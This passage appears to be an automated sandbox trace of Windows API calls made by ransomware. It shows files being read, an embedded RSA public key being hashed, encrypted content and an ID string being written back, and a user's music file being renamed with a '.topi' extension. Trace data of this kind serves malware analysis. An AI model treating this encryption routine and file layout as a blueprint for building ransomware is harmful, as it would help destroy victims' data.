lpNewFilePointer=0x0) returned 1 [0097.190] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.191] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.191] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x14464, lpOverlapped=0x0) returned 1 [0097.191] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.191] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.191] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.192] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.193] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.193] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.193] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.193] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.193] GetLastError () returned 0x0 [0097.193] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.193] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.193] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.193] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.193] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.193] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14460) returned 0x9a06a00 [0097.194] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03248 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4cb8 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03290 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4cd0 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d00 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d18 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.194] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d00 | out: hHeap=0x680000) returned 1 [0097.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d18 | out: hHeap=0x680000) returned 1 [0097.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.194] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0097.194] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4d18 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4d00 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d18 | out: hHeap=0x680000) returned 1 [0097.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d00 | out: hHeap=0x680000) returned 1 [0097.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.195] GetCurrentThreadId () returned 0x8c4 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f91e0 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.196] GetCurrentThreadId () returned 0x8c4 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d00 [0097.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d18 [0097.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ce8 [0097.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4d30 [0097.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0097.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d00 | out: hHeap=0x680000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d00 [0097.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d00 | out: hHeap=0x680000) returned 1 [0097.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d30 | out: hHeap=0x680000) returned 1 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d18 | out: hHeap=0x680000) returned 1 [0097.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ce8 | out: hHeap=0x680000) returned 1 [0097.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4cd0 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03290 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.200] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x1445f, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x1445f, lpOverlapped=0x0) returned 1 [0097.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.201] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x14464, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.201] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.201] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.201] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.201] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.201] CloseHandle (hObject=0x6a8) returned 1 [0097.203] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b45e8 [0097.203] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0097.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b45e8 | out: hHeap=0x680000) returned 1 [0097.203] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\HD3TE3n6wSRH5_2y6cr.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\hd3te3n6wsrh5_2y6cr.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\HD3TE3n6wSRH5_2y6cr.m4a.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\hd3te3n6wsrh5_2y6cr.m4a.topi")) returned 1 [0097.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.204] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0097.205] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd562f3e0, ftCreationTime.dwHighDateTime=0x1d5bef3, ftLastAccessTime.dwLowDateTime=0x9fc1c850, ftLastAccessTime.dwHighDateTime=0x1d5c14c, ftLastWriteTime.dwLowDateTime=0x9fc1c850, ftLastWriteTime.dwHighDateTime=0x1d5c14c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kddg-2aSE", 